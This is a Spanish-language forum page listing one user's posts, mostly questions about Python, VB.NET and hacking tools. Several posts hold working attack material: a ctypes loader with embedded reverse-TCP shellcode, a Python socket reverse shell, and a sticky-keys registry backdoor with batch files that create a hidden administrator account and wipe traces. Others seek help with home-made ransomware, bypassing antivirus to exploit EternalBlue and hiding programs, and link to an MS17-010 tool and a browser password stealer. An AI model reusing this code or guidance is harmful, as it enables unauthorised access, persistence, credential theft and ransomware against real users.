Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Sentex

#1
Scripting / [Python] Strings diferentes
22 Enero 2019, 20:41 PM
Buenas!.

Tengo un problemilla con una string. Como la string contiene información sensible os pongo una parte de la misma.

String:
Código (bash) [Seleccionar]

\x7B\x22country\x22\x3A\x22DE\x22,\x22currentUser


Código (python) [Seleccionar]

string = "\x7B\x22country\x22\x3A\x22DE\x22,\x22currentUser"

print(string)

Output: {"country":"DE","currentUser

Así funciona perfectamente pero cuando la string la consigo a través de regex la string se queda como el principio (\x7B\x22country\x22\x3A\x22DE\x22,\x22currentUser).
#2
Scripting / [PYTHON] Stream cmd con socket
9 Junio 2018, 14:38 PM
Buenas.

Tengo una duda desde hace muchísimo tiempo y es como puedo crear una cmd en un ordenador y controlarla desde otro a a través de socket. No se si me he explicado bien.

Windows 1 - Crear un proceso (cmd) y crear un server con socket.

Ordenador remoto - Conecta con windows y controla la cmd.

No quiero un ejecutor de commandos, quiero tener siempre el mismo proceso pudiendo asi cambiar de directorio, etc..
#3
Buenas!.

Mi problema es el siguiente:

Tengo un script que quiero pasar a exe pero que no se vea y para ello uso el argumento --noconsole en pyinstaller pero cuando lo ejecuto da error. El script no tiene ningún error ya que funciona perfectamente sin pasarlo a exe. No se si es porque pyinstaller no coje todas las librerías pero necesito solucionarlo pronto. Gracias!.

Script:
https://github.com/MrSentex/RonMalware/blob/master/client.py

Output pyinstaller:
Código (bash) [Seleccionar]

0037:err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.
672 INFO: PyInstaller: 3.3.1
676 INFO: Python: 2.7.0
678 INFO: Platform: Windows-7-6.1.7601-SP2
685 INFO: wrote C:\RonMalware\client.spec
701 INFO: UPX is not available.
706 INFO: Extending PYTHONPATH with paths
['C:\\RonMalware', 'C:\\RonMalware']
713 INFO: checking Analysis
718 INFO: Building Analysis because out00-Analysis.toc is non existent
726 INFO: Initializing module dependency graph...
774 INFO: Initializing module graph hooks...
902 INFO: running Analysis out00-Analysis.toc
951 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
  required by c:\Python27\python.exe
997 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_none ...
1006 INFO: Found manifest C:\windows\WinSxS\Manifests\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_deadbeef.manifest
1026 INFO: Searching for file msvcr90.dll
1030 INFO: Found file C:\windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_deadbeef\msvcr90.dll
1041 INFO: Searching for file msvcp90.dll
1046 INFO: Found file C:\windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_deadbeef\msvcp90.dll
1060 INFO: Searching for file msvcm90.dll
1064 INFO: Found file C:\windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_deadbeef\msvcm90.dll
1074 INFO: Adding redirect Microsoft.VC90.CRT version (9, 0, 21022, 8) -> (9, 0, 21022, 8)
1315 INFO: Caching module hooks...
1331 INFO: Analyzing C:\RonMalware\client.py
4644 INFO: Processing pre-safe import module hook   urllib3.packages.six.moves
11006 INFO: Processing pre-find module path hook   distutils
15789 INFO: Loading module hooks...
15792 INFO: Loading module hook "hook-distutils.py"...
15799 INFO: Loading module hook "hook-PIL.py"...
15807 INFO: Excluding import 'FixTk'
15813 INFO: Excluding import 'Tkinter'
15822 INFO: Excluding import 'PyQt5'
15830 INFO:   Removing import of PyQt5 from module PIL.ImageQt
15843 INFO: Excluding import 'PySide'
15862 INFO:   Removing import of PySide from module PIL.ImageQt
15869 INFO: Excluding import 'PyQt4'
15875 INFO:   Removing import of PyQt4 from module PIL.ImageQt
15885 INFO: Loading module hook "hook-httplib.py"...
15891 INFO: Loading module hook "hook-_tkinter.py"...
16690 INFO: checking Tree
16692 INFO: Building Tree because out00-Tree.toc is non existent
16698 INFO: Building Tree out00-Tree.toc
16977 INFO: checking Tree
16980 INFO: Building Tree because out01-Tree.toc is non existent
16991 INFO: Building Tree out01-Tree.toc
17029 INFO: Loading module hook "hook-PIL.Image.py"...
18325 INFO: Loading module hook "hook-requests.py"...
18339 INFO: Loading module hook "hook-cv2.py"...
21925 INFO: Processing pre-safe import module hook   _xmlplus
22714 INFO: Processing pre-find module path hook   site
22720 INFO: site: retargeting to fake-dir 'c:\\Python27\\lib\\site-packages\\PyInstaller\\fake-modules'
29451 INFO: Loading module hook "hook-certifi.py"...
29468 INFO: Loading module hook "hook-setuptools.py"...
29573 INFO: Loading module hook "hook-PIL.SpiderImagePlugin.py"...
29583 INFO: Excluding import 'FixTk'
29592 INFO: Excluding import 'Tkinter'
29599 INFO: Loading module hook "hook-encodings.py"...
31196 INFO: Loading module hook "hook-numpy.core.py"...
32574 INFO: Loading module hook "hook-sqlite3.py"...
33002 INFO: Loading module hook "hook-sysconfig.py"...
33013 INFO: Loading module hook "hook-xml.py"...
33201 INFO: Loading module hook "hook-pydoc.py"...
33210 INFO: Excluding import 'Tkinter'
33218 INFO:   Removing import of Tkinter from module pydoc
33224 INFO: Loading module hook "hook-pkg_resources.py"...
0046:err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.
34223 INFO: Processing pre-safe import module hook   win32com
34960 INFO: Loading module hook "hook-pywintypes.py"...
0048:err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.
35790 INFO: Loading module hook "hook-win32com.py"...
36960 INFO: Loading module hook "hook-pythoncom.py"...
004a:err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.
37862 INFO: Looking for ctypes DLLs
37944 INFO: Analyzing run-time hooks ...
37962 INFO: Including run-time hook 'pyi_rth__tkinter.py'
37970 INFO: Including run-time hook 'pyi_rth_pkgres.py'
37985 INFO: Including run-time hook 'pyi_rth_win32comgenpy.py'
37997 INFO: Including run-time hook 'pyi_rth_multiprocessing.py'
38030 INFO: Looking for dynamic libraries
38300 INFO: Searching for assembly x86_Microsoft.VC90.MFC_1fc8b3b9a1e18e3b_9.0.21022.8_none ...
38308 INFO: Found manifest c:\Python27\lib\site-packages\Pythonwin\Microsoft.VC90.MFC.manifest
38321 INFO: Searching for file mfc90.dll
38324 INFO: Found file c:\Python27\lib\site-packages\Pythonwin\mfc90.dll
38332 INFO: Searching for file mfc90u.dll
38336 INFO: Found file c:\Python27\lib\site-packages\Pythonwin\mfc90u.dll
38347 INFO: Searching for file mfcm90.dll
38365 INFO: Found file c:\Python27\lib\site-packages\Pythonwin\mfcm90.dll
38375 INFO: Searching for file mfcm90u.dll
38379 INFO: Found file c:\Python27\lib\site-packages\Pythonwin\mfcm90u.dll
38390 INFO: Adding redirect Microsoft.VC90.MFC version (9, 0, 21022, 8) -> (9, 0, 21022, 8)
58931 INFO: Looking for eggs
58934 INFO: Using Python library c:\Python27\python27.dll
58945 INFO: Found binding redirects:
[BindingRedirect(name=u'Microsoft.VC90.MFC', language=None, arch=u'x86', oldVersion=(9, 0, 21022, 8), newVersion=(9, 0, 21022, 8), publicKeyToken=u'1fc8b3b9a1e18e3b'), BindingRedirect(name=u'Microsoft.VC90.CRT', language=None, arch=u'x86', oldVersion=(9, 0, 21022, 8), newVersion=(9, 0, 21022, 8), publicKeyToken=u'1fc8b3b9a1e18e3b')]
59011 INFO: Warnings written to C:\RonMalware\build\client\warnclient.txt
59221 INFO: Graph cross-reference written to C:\RonMalware\build\client\xref-client.html
59745 INFO: checking PYZ
59747 INFO: Building PYZ because out00-PYZ.toc is non existent
59758 INFO: Building PYZ (ZlibArchive) C:\RonMalware\build\client\out00-PYZ.pyz
61743 INFO: Building PYZ (ZlibArchive) C:\RonMalware\build\client\out00-PYZ.pyz completed successfully.
62003 INFO: checking PKG
62006 INFO: Building PKG because out00-PKG.toc is non existent
62013 INFO: Building PKG (CArchive) out00-PKG.pkg
63257 INFO: Redirecting Microsoft.VC90.CRT version (9, 0, 21022, 8) -> (9, 0, 21022, 8)
83576 INFO: Building PKG (CArchive) out00-PKG.pkg completed successfully.
83863 INFO: Bootloader c:\Python27\lib\site-packages\PyInstaller\bootloader\Windows-32bit\runw.exe
83872 INFO: checking EXE
83876 INFO: Building EXE because out00-EXE.toc is non existent
83883 INFO: Building EXE from out00-EXE.toc
83888 INFO: Appending archive to EXE C:\RonMalware\dist\client.exe
83995 INFO: Building EXE from out00-EXE.toc completed successfully.
#4
Buenas, me gustaría ejecutar otro script diferente al original y luego poder cerrar el script original y dejando en segundo plano el script diferente.

Gracias!

PD: Es en linux
#5
Hola buenas.

Intento ejecutar una shellcode en un ordenador remoto (cliente) pero la shellcode esta en otro ordenador (el servidor). La ejecución de una shellcode en python seria el codigo siguiente:

Código (python) [Seleccionar]

from ctypes import *

shellcode = ("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\xc0\xa8\x01\x01\x68\x02"
"\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x61\x00\x00"
"\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83"
"\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a"
"\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57"
"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00"
"\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68"
"\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9\x71\xff\xff"
"\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00"
"\x53\xff\xd5") 

memory_ref = create_string_buffer(shellcode, len(shellcode))
shellcode = cast(memory_ref, CFUNCTYPE(c_void_p))
shellcode()


Y lo que quiero es leer en un .txt por ejemplo esa misma shellcode y luego ejecutarlo en el ordenador remoto. All tenerlo en un .txt se convierte en un string con lo cual no funciona. Necesito ayuda. gracias!
#6
Hola buenas estoy intentando hacer una reverse shell. Se puede usar este codigo para manejar una cmd con subprocess
Código (python) [Seleccionar]

import sys
import subprocess

theproc = subprocess.Popen("C:\\Windows\\System32\\cmd.exe", shell = True)
theproc.communicate()


Y me gustaria conseguir que funcionara con socket de forma remota.

Gracias!.
#7
Scripting / Sockets python
19 Enero 2018, 20:38 PM
Hola, buenas.

Tengo un problema y es que sockets en python no me conecta a un servidor remoto no entiendo el porque pero ahí esta.

Alguien tiene la solución.

Info:

Cliente - Pc normal

Server - VPS Linux con iptables -f
#8
Scripting / IOError: [Errno 0] Error
15 Enero 2018, 21:53 PM
Hola buenas.

Estoy intentando hacer un script pero me da un error muy extraño a veces da error y otras no.

Este es el script:
Código (python) [Seleccionar]

# -*- coding: utf-8 -*-

from ipcalc import IP, Network
from time import sleep

ip = ""
ipr = ""

for x in Network('192.168.1.0/24'):
    ip = ip + "," + str(x)

ip = ip[1:]
ipr = ip.split(',')

number = 0

while number <= 253:
    print ipr[number]
    number += 1


Código (bash) [Seleccionar]

Y la salida es :
192.168.1.1
192.168.1.2
192.168.1.3
192.168.1.4
192.168.1.5
192.168.1.6
192.168.1.7
192.168.1.8
192.168.1.9
192.168.1.10
192.168.1.11
1Traceback (most recent call last):
  File "C:\Users\Thomas\Desktop\Programas\Herramientas\Network Scanner\test.py", line 20, in <module>
    print ipr[number]
IOError: [Errno 0] Error
#9
Scripting / Declarar variables infinitas
2 Enero 2018, 04:53 AM
Buenas me gustaria declarar variables infinitas desde python por ejemplo
s1 = "Hola"
s2 = "Hola"
s3 = "Hola"
s4 = "Hola"

y asi infinitamente
#10
Dudas Generales / Visual Studio 2017 C++
17 Octubre 2017, 15:53 PM
Hola he buscado por internet y no encuentro nada que repare mi problema.
Vereis estoy programando en C en visual studio 2017 y al parecer no tengo librerias de c++ porque cuando las intento incluir da error.
#11
Hola buenas he buscado por google pero no he encontrado nada se que funciona en linux pero en windows me da error.

Código (python) [Seleccionar]

#!/usr/bin/python

import socket
import subprocess
import os

host = "127.0.0.1"
port = 4444

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(['cmd.exe'])


y me salta el error de Bad file descriptor y no se por que.
#12
Scripting / [PYTHON] Esconder consola sin .pyw
29 Septiembre 2017, 20:31 PM
Hola veréis  quiero que la consola de un script no se vea y no puedo usar .pyw porque lo oy ha pasar a exe y no se si eso se puede hacer con alguna opción de pyinstaller o se puede hacer con otra cosa.

Gracias por vuestra atención!
#13
Scripting / Subproceso en windows desde python
29 Septiembre 2017, 18:25 PM
Hola he estado investigando para hacer un subproceso en windows y no he conseguido encontrar nada ni con Call ni con Popen del module subprocess de python me funciona se habré en la propia consola del programa.
#14
Bugs y Exploits / Bypass AVG Online Shield
28 Septiembre 2017, 19:38 PM
Veréis tengo un pc el cual quiero vulnerar. Es vulnerable a ethernalblue pero tiene AVG instalado y este bloquea todos mis intentos. Es en una red local es solo para ver si lo consigo. ¿Se podría hacer algo para conseguir vulnerar el ordenador?
#15
Scripting / python reverse shell
26 Septiembre 2017, 19:37 PM
Hola buenas me gustaría saber si puedo hacer una reverse shell con python para windows y que conecte con otro python en linux. ¿Se podria hacer con sokets?.  ¿Se puede hacer para que no se vea?
#16
Scripting / Args en python
24 Septiembre 2017, 20:38 PM
Hola buenas me preguntaba como podría hacer lago así en python:

python script.py hola

la salida seria asi:

hola

osea que lo que pongas detrás se escriba he buscado por Internet y no entiendo lo que hacen.
#17
Mensajería / WolfSec
22 Septiembre 2017, 16:44 PM
Hola hoy os traigo un OnionIRC creado por mi squad (Recién creada!) para que la gente comparta conocimiento y tal. Puede meterse todo el mundo así que meteros si quereis.

Todo el mundo puede meterse y ser quien quiera ya que es anónimo xd.

Como entrar?
Desde linux es fácil también solo tendremos que hacer los siguiente!

sudo apt-get install tor -y
sudo killall tor
tor

Ir a Universal mas abajo!

Desde windows es muy facil es descargase tor pero no el tor browser si no el tor  expert Bundle que es el mismo que tenemos en linux pero en .exe xd.

Descargar: https://www.torproject.org/dist/torbrowser/7.0.5/tor-win32-0.3.0.10.zip

Bien una vez este esto descargado solo tenemos que descargar un cliente IRC como puede ser hexchat

Descargar: https://hexchat.github.io/downloads.html Ahí elegís la versión y lo instaláis.

UNIVERSAL (ESTO HAY QUE HACERLO TANTO EN WINDOWS COMO EN LINUX)

Después solo queda ejecutar y configurar el proxy.

Ejecutar: Extrae el .zip y entra en la carpeta tor y ejecuta tor.exe una vez hecho eso espera a que este al 100% y ya estaría ahora no lo cerréis.

Configurar hexchat y proxy:

Abriremos el hexchat y nos aparecerá una ventanita y le daremos a add , le pondremos cualquier nombre y luego le le dais a edit y en la configuración ponéis esto.
IP: bagt7tzpljpeib2b.onion/6667

La contraseña da igual eso es solo para mi y claro poneros otro user!.

Para configurar el proxy tendremos que dale a close una vez que terminamos de configurar lo todo. Le daremos a connect y nos dara error pero nos tendremos que ir aqui.

Que hay que hacer https://gyazo.com/9d48d77c360dce33037e97f26350aafc


para los de linux cambiad el 9050 por 9051.

Os espero en #main !
#18
Scripting / Hook teclado Python
14 Septiembre 2017, 19:51 PM
Hola buenas estoy haciendo un script que al detectar una tecla realice una acción quiero que sea en todo el sistema no solo en la terminal de python.

Por ejemplo

Codigó:

import pyxhook

hm = pyxhook.HookManager()

hm.HookKeyboard()

while True:
         if hm.keyDown("v"):
                   hm.keyDown("r")
#19
Como se haría?
#20
Scripting / Bloquear teclado y raton python
12 Septiembre 2017, 15:03 PM
Hola buenas tengo una duda estoy intentando bloquear el teclado y el ratón en python pero no se como he probado con esto;
Código:

   
Código (python) [Seleccionar]

     import keyboard
     import mouse        

     def disable(event):
               return False
     mo = mouse
     mo.move = disable


Pero no funciona alguien me ayuda?
#21
.NET (C#, VB.NET, ASP) / Ayuda con DotNet
8 Septiembre 2017, 12:17 PM
Hola buenas!.

  He instalado dotnet en mi debian pero tengo un problema no funciona.
  Osea cuando pongo dotnet en la consola solo me dice que no existe y ya no se que hacer.
#22
.NET (C#, VB.NET, ASP) / Shell() en C#
5 Septiembre 2017, 10:46 AM
Hola tengo una duda.

  Tengo un programa que funciona muy bien en VB.Net con la ayuda de Shell() todo funciona bien.

   Pero me toca pasarlo a C# ya que en Debian con Monodevelop esa opción no funciona.
   Me gustaria saber si hay alguna forma de hacerlo igual pero sin utilizar
   System.Diagnostics.Process.Start(); ya que lo he probado y no ha funcionado

Gracias.
#23
Mensajería / Grupo Etico
5 Septiembre 2017, 10:37 AM
Grupo de hacking ético nada que ver con elhacker.net para no molestar jeje.

Seguid este tutorial https://www.anonymous-france.eu/how-to-connect-to-the-onionirc.html

Si lo haceis como se debe entrareis al servidor CyberGuerrilla luego os registrais poniendo.
                                 /join #OpNewBlood
                                 /msg NickServ REGISTER Contraseña email

Luego entráis al IRC de presentación.
                  /join #FunSec
Al hacerlo os presentáis para ver si entráis o no.

                  AVISO

         No aceptamos a menores de 15 ya que no los vemos suficientemente maduros.
         No aceptamos a gente que viene a aprender a ser "hacker" tienes que centrarte en algo.
         Cada uno tiene sus roles.
         Respeta la jerarquía.

----------------------------------------------------

            Mucha suerte !!!!
#24
Hola!

Necesito ayuda en un programa que quiero hacer.
Necesito que el programa sea en vb o C# pero en aplicacion de consola.
Pero no se hacer que cuando se ejecute puedas poner opciones.

Ejemplo test.exe -ftp ftp.server.com -p hola123 -u user

Algo asi se podria hacer?


· Los titulos deben ser descriptivos
>aquí las reglas del foro
-Engel Lex
#25
Software / IDGAF SMB Tool By Sentex
11 Julio 2017, 20:21 PM
Hola hoy os traigo una tool para vulnerar ordenadores con el exploit MS17-010.

La tool puede tanto como vulnerar y desvulnerar el ordenador.

Aviso: Esta tool no esta orientada a la maldad es simple educacion para que gente pueda vulnerar su pc y probar el exploit robado de la NSA.



Descarga

https://mega.nz/#!NLQ0EKRS!qSDY30VbwMY0jGBFNyvdOBk4e-zQ1mo3-ToXY2ttyL8
NoDistriute: https://nodistribute.com/result/T7YIMgAHbXliuqSmR6

Los que quieran ver la source la cual es muy simple pregunteme por skype


· Imagenes ajustadas a las reglas del foro
· Tema movido a subforo apropiado
>aquí las reglas del foro
-Engel Lex
#26
Hola
Me gustaria instalar la herramienta ya presente en wifislax en kali que es la distro que uso actualmente.
No la quiero usar para molestar a la gente es solo para tenerla presente y usarla cuando sea                necesario y estudiarla para poder hacerlo yo manualmente.

Gracias.
#27
Hacking Wireless / Wireshark Duda
29 Junio 2017, 12:30 PM
Hola
Necesito saber que comando puedo utilizar para que wireshark en windows empiece ha escanear automaticamente con un filtro.

Gracias
#28
Software / Browser Passwd Recovery By XenHack
7 Junio 2017, 23:15 PM
Hola hoy os traigo un programa para recuperar las contraseñas de los navegadores.
El motivo de su creación no es para cometer ilegalidades robando las contraseñas de otros pc's pero no digo que no sirva  >:D

Bien el programa utiliza LaZagne pero lo hace todo automáticamente para que el utilizado no tenga que preocuparse de nada.

http://download856.mediafire.com/h5pevfnmm3vg/26tvjb8ux8tszh4/XenHack+Passwd+Recovery.exe
#29
Hola hoy he descubierto entre comillas como tener acceso a un pc sin cambiar la clave de ningún usuario.

Pasos
1. Necesitas tener privilegios de administrador durante unos segundos y poner este cosigo en una CMD ejecutada con privilegios.
Codigo:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
(Si no puedes tener permisos de administrador porque el dueño de el ordenador no lo consiente intenta ingeniería social o algún BypassUAC)
2. Crear un directorio donde sea con el nombre que quieras con dos .bats uno que es el que hay que ejecutar y el otro es para limpiar huellas.
Codigo 1
@echo off
color 0a
title BaCkDoOr
echo ---------------------------------------------------
echo /\/\/\/\/\/\/\/Apollo Admin Exploit/\/\/\/\/\/\/\/\
echo ---------------------------------------------------
echo Creando nuevo usuario...
net user Exploit /add
echo Usuario creado
echo Dando permisos de administrador...
net localgroup administradores Exploit /add
echo El usuario ha recivido privilegios de administrador
echo Necesita reiniciar el ordenador para que haga efecto.
echo Pulse una tecla para reiniciar.
pause>null
DEL null
shutdown /r -t 00
exit
Codigo 2
@echo off
color 0a
title BaCkDoOr
echo ---------------------------------------------------
echo ===================================================
echo /\/\/\/\/\/\/\/Apollo Admin Exploit/\/\/\/\/\/\/\/\
echo ===================================================
echo ---------------------------------------------------
echo Eliminado usuario..
net user Exploit /delete
echo Usuario eliminado!
echo Eliminando archivos residuales
cd ..
cd C:/Users/
RD /S /Q Exploit
echo Pulse cualquier tecla para reiniciar.
pause>null
del null
shutdown /r -t 00
exit

Estos dos bats necesitan ser ejecutados con permisos de administrador pero eso ya lo habíamos pensado antes verdad  >:D
3. Cerraremos sesión y pulsaremos el Shift 5 veces seguidas y se nos abrirá una cmd con todos los derechos. Lo siguiente sera ir al directorio donde abreis guardado los dos bats y ejecutar el primer bat y luego se reiniciara el pc. Después del reinicio aparecerá un usuario nuevo llamado Exploit iniciaran sesión con todos los privilegios posibles.

4.Disfruten de su acceso pero no apaguen el ordenador cierren sesión y con el mismo proceso para abrir la cmd ejecuten el segundo bat que eliminara el usuario y todos los ficheros para que después del reinicio no quedara nada relacionado con el usuario previamente creado.

Ya se que esto es muy sencillo pero mas vale tenerlo por si nos cambian la contraseña o no la recordamos.

By Apollo.
#30
Hola tengo una duda.

Como hago para que mi programa se añada solo al startup del ordenador

Gracias!.
#31
Hola estoy creando un WannaCry2.0 no es para hacer el mal es solo un esperimento porque me puse el reto de hacerlo.
Ahora mismo estoy bloqueado ya que el Ctrl + Alt + Supr no se puede bloquear y el administrador de tareas no puedo pararlo y me puede cerrar el programa y no se como hacer para cifrar todos los ficheros del ordenador y tal.

Cuando termine el proyecto publicare la source para que vean todos como se hizo.

Gracias.
#32
Hola me gustaría bloquear solo el alt para que no se pueda efectuar ctrl alt supr

Gracias
#33
Foro Libre / Se necesitan programadores
1 Junio 2017, 13:17 PM

                                                     XenHack
-------------------------------------------------------------------------------------------------
Hola busco programadores para un grupo.
No cometeremos ilegalidades (Porque si no el admin se enfada XD)  >:D
Solo programaremos cosillas que creamos que la gente necesitaría y ya esta.
Se busca gente que sepa VB , C# , C++ y Python.
Edad mínima 14
Tendremos hosting dedicado con ftp y una web.

Gracias por buestra antención

Skype en mi firma.
--------------------------------------------------------------------------------------------------
#34
Hola.
Necesitaría saber como determinar si existe un proceso y ejecutar una acción en VB.Net

Ejemplo:
If (Codigo para detectar el proceso) Then
Shell(taskkill /IM proceso.exe)
Else
'Nada
End If

Gracias por su atención ;)
#35
Hola voy ha crear un grupo de programadores XenSec.
Nos dedicaremos al hacking en vídeo juegos y mas cosas.
Busco gente con conocimientos php, VB, C++, C#.

No delinquiremos a menos que lo necesitemos por algún asunto de extremada urgencia.

Kit de iniciación del grupo.
Cyber Ghost Gratis.

Gracias y atentamente Apollo (Aunque aquí me llame TeXx me llamo apollo XD)

Si estas interesado pon tu skype en una respuesta.
#36
Ingeniería Inversa / Necesito ayuda
14 Mayo 2017, 17:34 PM
Estoy creando un hack para paladins pero necesito hacerle el bypass al easy anticheat pero necesito que cuando detecte el proceso ejecute una accion.
Es en VB

Alguien me ayuda.
Gracias.




· Tema movido, esto no es una duda general, es Ing. Inversa
>aquí las reglas del foro
-Engel Lex
#37
Ingeniería Inversa / descifrar un .exe
16 Abril 2017, 21:14 PM
Hola he encontrado un programa que tiene una musica orrible pero lo uso mucho lo abro con VB DECOMPILER pero esta obfuscado con Attribute

Alguen sabe como desencriptarlo
#38
Hola!!!
Quisiera preguntar si  hay algun grupo de "hackers" españoles o de habla hispana
No piensen mal de que lo que busco es un grupo para hackear web s o lo que sea
Lo que busco es gente con conocimientos para que parendamos cosas unos de otros porque
el conocimiento es libre

Gracias por leerlo  :D :D :D